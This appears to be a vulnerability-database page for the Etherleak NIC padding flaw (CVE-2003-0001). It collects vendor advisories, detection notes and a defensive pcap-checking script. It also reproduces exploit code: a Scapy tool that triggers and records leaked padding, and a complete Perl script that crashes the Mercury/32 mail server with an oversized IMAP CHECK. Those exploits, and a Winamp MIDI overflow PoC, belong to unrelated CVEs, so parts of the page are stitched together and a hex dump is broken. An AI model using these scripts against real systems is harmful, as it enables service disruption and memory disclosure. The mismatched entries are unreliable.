CVE-2003-0001
Published 2003-01-17
Priority P3 · 41 · medium · 5 · CVSS 2.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 73.01% (99.4th percentile)
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
Affected
99 ranges · showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| freebsd | freebsd | — | — |
| juniper | junos | < 18.4 | 18.4 |
| juniper | junos | < 18.3 | 18.3 |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
| juniper | junos | — | — |
Detection & IOCs (extracted from sources)
- Detect Etherleak (CVE-2003-0001) by capturing Ethernet frames where the captured packet length exceeds the sum of the Layer 2 header size plus the Layer 3/4 payload length; the trailing bytes beyond the payload constitute leaked kernel memory padding.
- Filter for Ethernet frames carrying a Scapy 'Padding' layer on ARP or ICMP traffic to identify hosts leaking kernel memory in frame padding.
- For ARP-based Etherleak detection, extract leaked bytes at offset 10–14 of the padding layer; for ICMP-based detection, extract bytes at offset 9–13 of the padding layer.
- Trigger Etherleak disclosure by sending ARP or ICMP packets to the target and sniffing responses for non-zero padding beyond the protocol payload boundary.
- Datalink type 1 (Ethernet) frames have a 14-byte L2 header; datalink type 113 (Linux cooked capture) frames have a 16-byte header. Any captured bytes beyond header+payload length indicate leaked memory padding.
- Cisco IOS 12.1 and 12.2 trains are explicitly stated as NOT affected by this vulnerability.
- National Semiconductor Ethernet controller chips are not vulnerable to this issue.
- Juniper ScreenOS devices (all versions prior to 6.3.0r25) do not pad Ethernet packets with zeros and are affected; this issue is often detected as CVE-2003-0001.
- Juniper Junos OS on PTX1000/PTX10000 and QFX10000/PTX5000 Series devices sometimes do not reliably pad Ethernet packets; this issue is also known as 'Etherleak' and often detected as CVE-2003-0001.
- Juniper SRX1400, SRX3400, and SRX3600 running affected Junos versions do not properly initialize memory locations used during padding of Ethernet packets, leaking sensitive information; a related issue to CVE-2003-0001.
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat · 5.0 MEDIUM
Juniper
CVE-2022-22216 [MEDIUM] CWE-200 · vendor_juniper · 2022-07-20 · CVSS 4.3
CVE-2022-22216: An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series allows an adjacent unauthenticated attacker to gain access to sensitive information. PTX1000 and PTX10000 Series, and QFX10000 Series and PTX5000 Series devices sometimes do not reliably pad Ethernet packets, and thus some packets can contain fragments of system memory or data from previous packets. This issue is also known as 'Etherleak' and often detected as CVE-2003-0001. This issue affects: Juniper Networks Junos OS on PTX1000 and PTX10000 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R2-S3, 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to
Palo Alto
CVE-2021-3031 [MEDIUM] CWE-200 · vendor_paloalto · 2021-01-13 · CVSS 5.0
PAN-OS: Information exposure in Ethernet data frame construction (Etherleak)
Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-5000 Series, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attacker on the same Ethernet subnet as the PAN-OS firewall is able to collect potentially sensitive information from these packets.
This issue is also known as Etherleak and is detected by security scanners as CVE-2003-0001.
Affected products: PAN-OS
Solution: This issue is fixed in PAN-OS 8.1.18, PAN-OS 9.0.12, PAN-OS 9.1.5, and all later PAN-OS versions.
Workaround: There is no wor
Juniper
CVE-2018-0014 [MEDIUM] CWE-200 · vendor_juniper · 2018-01-10 · CVSS 4.3
CVE-2018-0014: Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25.
Juniper
CVE-2013-4690 [MEDIUM] CWE-399 · vendor_juniper · 2013-07-11 · CVSS 5.0
CVE-2013-4690: Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX1400, SRX3400, and SRX3600 does not properly initialize memory locations used during padding of Ethernet packets, which allows remote attackers to obtain sensitive information by reading packet data, aka PR 829536, a related issue to CVE-2003-0001.
Red Hat
CVE-2003-0001 [MEDIUM] CWE-200 · vendor_redhat · 2003-01-06 · CVSS 5.0
cisco: information leak in ethernet frames.
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Package: kernel (Red Hat Enterprise Linux 7) - Not affected
Package: kernel-rt (Red Hat Enterprise Linux 7) - Not affected
Package: kernel (Red Hat Enterprise Linux 8) - Not affected
Package: kernel-rt (Red Hat Enterprise Linux 8) - Not affected
GHSA
GHSA-8r8m-8qj7-8fm2 (CVE-2022-22216) [MEDIUM] CWE-200 · ghsa_unreviewed · 2022-07-21 · CVSS 5.0
An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in the PFE of Juniper Networks Junos OS on PTX Series and QFX10k Series allows an adjacent unauthenticated attacker to gain access to sensitive information. PTX1000 and PTX10000 Series, and QFX10000 Series and PTX5000 Series devices sometimes do not reliably pad Ethernet packets, and thus some packets can contain fragments of system memory or data from previous packets. This issue is also known as 'Etherleak' and often detected as CVE-2003-0001. This issue affects: Juniper Networks Junos OS on PTX1000 and PTX10000 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R2-S3, 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.3 versions prior to 19.3R3-S4; 19.4 versions prior to 19.4R2-S5, 19.4
GHSA
GHSA-v97c-wm3x-xr3x (CVE-2021-3031) [MEDIUM] CWE-200 · ghsa_unreviewed · 2022-05-24 · CVSS 5.0
Padding bytes in Ethernet packets on PA-200, PA-220, PA-500, PA-800, PA-2000 Series, PA-3000 Series, PA-3200 Series, PA-5200 Series, and PA-7000 Series firewalls are not cleared before the data frame is created. This leaks a small amount of random information from the firewall memory into the Ethernet packets. An attacker on the same Ethernet subnet as the PAN-OS firewall is able to collect potentially sensitive information from these packets. This issue is also known as Etherleak and is detected by security scanners as CVE-2003-0001. This issue impacts: PAN-OS 8.1 version earlier than PAN-OS 8.1.18; PAN-OS 9.0 versions earlier than PAN-OS 9.0.12; PAN-OS 9.1 versions earlier than PAN-OS 9.1.5.
GHSA
GHSA-hx48-9j3f-rqqx (CVE-2013-4690) [MEDIUM] · ghsa_unreviewed · 2022-05-17 · CVSS 5.0
Juniper Junos 10.4 before 10.4S13, 11.4 before 11.4R7-S1, 12.1 before 12.1R5-S3, 12.1X44 before 12.1X44-D20, and 12.1X45 before 12.1X45-D10 on the SRX1400, SRX3400, and SRX3600 does not properly initialize memory locations used during padding of Ethernet packets, which allows remote attackers to obtain sensitive information by reading packet data, aka PR 829536, a related issue to CVE-2003-0001.
GHSA
GHSA-xgmx-gwqj-mmc5 (CVE-2018-0014) [MEDIUM] CWE-200 · ghsa_unreviewed · 2022-05-13 · CVSS 5.0
Juniper Networks ScreenOS devices do not pad Ethernet packets with zeros, and thus some packets can contain fragments of system memory or data from previous packets. This issue is often detected as CVE-2003-0001. The issue affects all versions of Juniper Networks ScreenOS prior to 6.3.0r25.
GHSA
GHSA-945x-53jf-h5qf (CVE-2003-0001) [MEDIUM] CWE-200 · ghsa_unreviewed · 2022-04-29
Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.
No detection rules found.
Exploit-DB
Cisco ASA < 8.4.4.6 < 8.2.5.32 - Ethernet Information Leak
exploitdb · 2013-06-10 · CVSS 5.0 · CVE-2003-0001 [MEDIUM]
---
#                                                     .1t....~.k.|
# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|
# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\gl"...+.9|
# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S "
    sys.exit(1)
type = sys.argv[2]
if type == 'arp':
    pass
elif type == 'icmp':
    pass
else:
    print "Bad type!"
    sys.exit(0)
pid = os.fork()
if(pid):
    print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
    spawn(sys.argv[1],sys.argv[2])
while True:
    if type == 'arp':
        myfilter = "host %s and arp" % sys.argv[1]
    elif type == 'icmp':
        myfilter = "host %s and icmp" % sys.argv[1]
    x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
    p = x[0]
    if type == 'arp':
        pad = p.getlayer(2)
    if type == 'icmp':
        pad =
Exploit-DB
Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure
exploitdb · 2007-03-23 · CVSS 5.0 · CVE-2003-0001 [MEDIUM]
---
source: https://www.securityfocus.com/bid/6535/info
Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.
Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.
Cisco has stated that the IOS 12.1 and 12.2 train
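The detection notes above (captured length exceeding the L2 header plus the declared L3 length, with a 14-byte header for datalink type 1 and a 16-byte header for datalink type 113) and the frame-buffer explanation in the Exploit-DB text describe one check. The script below implements that check as a defender's pcap triage helper; it is an added example, not code from this page, from the Exploit-DB entries or from any vendor advisory. Everything in it is constructed for the demonstration: the MAC and IP addresses, the 18-byte non-zero tail standing in for leaked memory, and the frames themselves. The arithmetic it relies on is standard Ethernet: a minimum frame is 60 bytes without FCS, so a 42-byte ARP or ICMP echo frame arrives with 18 bytes of driver padding, which should be all zeros.

```python
import struct

# Link-layer header sizes named in the detection notes.
ETH_HDR_LEN = 14   # DLT 1, Ethernet
SLL_HDR_LEN = 16   # DLT 113, Linux cooked capture

ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
ARP_IPV4_LEN = 28  # fixed size of an Ethernet/IPv4 ARP message


def l3_length(ethertype, payload):
    """Declared Layer 3 length of the payload, or None when we cannot tell."""
    if ethertype == ETHERTYPE_IPV4 and len(payload) >= 20:
        return struct.unpack("!H", payload[2:4])[0]   # IPv4 Total Length field
    if ethertype == ETHERTYPE_ARP:
        return ARP_IPV4_LEN
    return None


def trailing_bytes(frame, linktype=1):
    """Bytes past header + declared L3 length (the padding), or None."""
    hdr_len = ETH_HDR_LEN if linktype == 1 else SLL_HDR_LEN
    if len(frame) < hdr_len:
        return None
    # Both header formats end with the EtherType / protocol field.
    ethertype = struct.unpack("!H", frame[hdr_len - 2:hdr_len])[0]
    plen = l3_length(ethertype, frame[hdr_len:])
    if plen is None or hdr_len + plen > len(frame):
        return None   # unsupported protocol, or capture truncated by snaplen
    return frame[hdr_len + plen:]


def classify(frame, linktype=1):
    """'leak' means padding is present and not all zero."""
    tail = trailing_bytes(frame, linktype)
    if tail is None:
        return "unknown"
    if not tail:
        return "no-padding"
    return "leak" if any(tail) else "zero-padding"


def scan(frames, linktype=1):
    """Count verdicts over a capture; a non-zero 'leak' count is the finding."""
    counts = {"leak": 0, "zero-padding": 0, "no-padding": 0, "unknown": 0}
    for f in frames:
        counts[classify(f, linktype)] += 1
    return counts


# ---- constructed sample traffic (not captured from any real host) ----
SRC_MAC = bytes.fromhex("021122334455")
DST_MAC = bytes.fromhex("02aabbccddee")
SRC_IP = bytes([192, 0, 2, 1])
DST_IP = bytes([192, 0, 2, 2])
# 18 made-up non-zero bytes standing in for uninitialised buffer contents
LEAKED_PAD = bytes.fromhex("729bac64749ba4d9235b92820d0b31f0a94f")


def icmp_echo_reply_frame(padding):
    """Minimal Ethernet/IPv4/ICMP echo reply (checksums left zero) plus padding."""
    eth = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_IPV4)
    icmp = struct.pack("!BBHHH", 0, 0, 0, 0x1234, 1)          # type 0 = echo reply
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0,
                     64, 1, 0, SRC_IP, DST_IP)
    return eth + ip + icmp + padding                           # 42 bytes + padding


def arp_reply_frame(padding):
    """Minimal Ethernet/IPv4 ARP reply plus padding."""
    eth = DST_MAC + SRC_MAC + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)
           + SRC_MAC + SRC_IP + DST_MAC + DST_IP)               # 28 bytes
    return eth + arp + padding


def to_linux_cooked(eth_frame):
    """Re-encapsulate an Ethernet frame as DLT 113 to exercise the 16-byte path."""
    sll = struct.pack("!HHH8s", 0, 1, 6, eth_frame[6:12] + b"\x00\x00")
    return sll + eth_frame[12:14] + eth_frame[14:]


SAMPLE_FRAMES = [
    icmp_echo_reply_frame(LEAKED_PAD),      # leak
    arp_reply_frame(LEAKED_PAD),            # leak
    icmp_echo_reply_frame(b"\x00" * 18),    # correctly zero-padded
    arp_reply_frame(b""),                   # no padding captured at all
]

if __name__ == "__main__":
    for f in SAMPLE_FRAMES:
        print(classify(f), (trailing_bytes(f) or b"").hex())
    print(scan(SAMPLE_FRAMES))
```

In practice the frames come from a capture file (for example Scapy's `rdpcap`) together with its link type; passing the wrong link type makes the EtherType field land inside the address field, so the frame is reported as "unknown" rather than as a false leak. Frames truncated by the capture snaplen are also reported as "unknown", since the padding was never recorded.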
Exploit-DB
Ethernet Device Drivers Frame Padding - 'Etherleak' Information Leakage
exploitdb · 2007-03-23 · CVSS 5.0 · CVE-2003-0001 [MEDIUM]
---
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would become known as the 'etherleak' bug. In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary. This task is left up to the driver
# for the ethernet device. The RFCs state that this padding must consist
# of NULLs. The bug is that at the time and still to this day, many device
# drivers do not pad with NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of t
Exploit-DB
Mercury/32 Mail Server 4.01a - 'check' Buffer Overflow
exploitdb · 2004-12-01 · CVE-2004-2513
---
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
#############################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
    print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
    sleep(1);
    print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
    sleep(1);
    print $socket "0001 CHECK " . "A" x 512 . "\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
# milw0rm.com [2004-12-01]
Exploit-DB
NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow (PoC)
exploitdb · 2003-09-08 · CVE-2003-0765
---
source: https://www.securityfocus.com/bid/8567/info
Winamp MIDI plugin, IN_MIDI.DLL has been reported prone to a buffer overflow issue when handling malicious MIDI files. The issue presents itself when a malicious value is passed as the Track Data Size of a malicious MIDI file header. Although unconfirmed it has been conjectured that an attacker may exploit this condition to execute arbitrary code in the context of the user who is running the affected Winamp player.
| Size | Field | Value |
|---|---|---|
| 4 bytes | MIDI header | "MThd" |
| 4 bytes | Header data size | 00000006 |
| 2 bytes | Format | 0000 |
| 2 bytes | Number of tracks | 0001 |
| 2 bytes | Divisions | 0001 |
| 4 bytes | Track header | "MTrk" |
| 4 bytes | Track data size | ffffffff <--- bug |

... "aaaaaaaaaaaa
- http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html
- http://marc.info/?l=bugtraq&m=104222046632243&w=2
- http://secunia.com/advisories/7996
- http://www.atstake.com/research/advisories/2003/a010603-1.txt
- http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
- http://www.kb.cert.org/vuls/id/412115
- http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
- http://www.osvdb.org/9962
- http://www.redhat.com/support/errata/RHSA-2003-025.html
- http://www.redhat.com/support/errata/RHSA-2003-088.html
- http://www.securityfocus.com/archive/1/305335/30/26420/threaded
- http://www.securityfocus.com/archive/1/307564/30/26270/threaded
- http://www.securitytracker.com/id/1031583
- http://www.securitytracker.com/id/1040185
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2665